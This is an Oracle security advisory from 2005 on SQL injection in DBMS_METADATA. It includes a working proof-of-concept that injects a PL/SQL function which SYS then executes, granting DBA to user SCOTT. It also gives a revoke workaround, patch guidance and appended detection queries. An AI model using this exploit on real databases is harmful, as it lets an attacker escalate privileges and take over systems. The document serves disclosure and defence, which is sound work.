SQL Injection via Oracle DBMS_METADATA in Oracle 9i / 10g

Details

The following proof of concept exploit code injects a custom PL/SQL function. This function is executed in the SYS context and grants the DBA permission to the user SCOTT.

Workarounds

    REVOKE EXECUTE ON SYS.DBMS_METADATA FROM PUBLIC FORCE;

Example

    -- Create a function first and inject this function. The function will be executed as user SYS.
    CREATE OR REPLACE FUNCTION "SCOTT"."ATTACK_FUNC" return varchar2
    authid current_user as
    pragma autonomous_transaction;
    BEGIN
      EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
      COMMIT;
      RETURN '';
    END;
    /

    -- Inject the function in the vulnerable procedure
    SELECT SYS.DBMS_METADATA.GET_DDL('''||SCOTT.ATTACK_FUNC()||''','') FROM dual;

Patch Information

Revoke the grants or apply the patches mentioned in Oracle Critical Patch Update April 2005.

© 2005 by Red-Database-Security GmbH - last update 02-nov-2005
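
The following queries are an added example, not part of the original advisory: they verify that the workaround took effect and review the database for signs that the privilege escalation described above was already used. They assume a session that can read the DBA_ dictionary views; the SYS/SYSTEM exclusion lists are an assumption and should be adjusted to the site's expected administrators.

```sql
-- 1. Verify the workaround: after the REVOKE, PUBLIC must not appear here.
--    Any remaining grantee can still reach the vulnerable package.
SELECT grantee, privilege, grantor
FROM   dba_tab_privs
WHERE  owner      = 'SYS'
AND    table_name = 'DBMS_METADATA'
AND    privilege  = 'EXECUTE'
ORDER  BY grantee;

-- 2. Review who holds the DBA role. The proof of concept ends with
--    GRANT DBA, so an unexpected grantee (SCOTT in the advisory's example)
--    indicates the flaw may have been exercised.
--    Assumption: SYS and SYSTEM are the only expected holders.
SELECT grantee, granted_role, admin_option
FROM   dba_role_privs
WHERE  granted_role = 'DBA'
AND    grantee NOT IN ('SYS', 'SYSTEM')
ORDER  BY grantee;

-- 3. Heuristic review list: stored code outside SYS/SYSTEM that combines
--    an autonomous transaction with a GRANT statement, the same shape as
--    the injected function. Legitimate code can match and obfuscated code
--    can evade this, so treat hits as items to inspect, not as proof.
SELECT owner, name, type
FROM   dba_source
WHERE  owner NOT IN ('SYS', 'SYSTEM')
GROUP  BY owner, name, type
HAVING MAX(CASE WHEN UPPER(text) LIKE '%AUTONOMOUS_TRANSACTION%'
                THEN 1 ELSE 0 END) = 1
AND    MAX(CASE WHEN UPPER(text) LIKE '%GRANT %'
                THEN 1 ELSE 0 END) = 1
ORDER  BY owner, name;
```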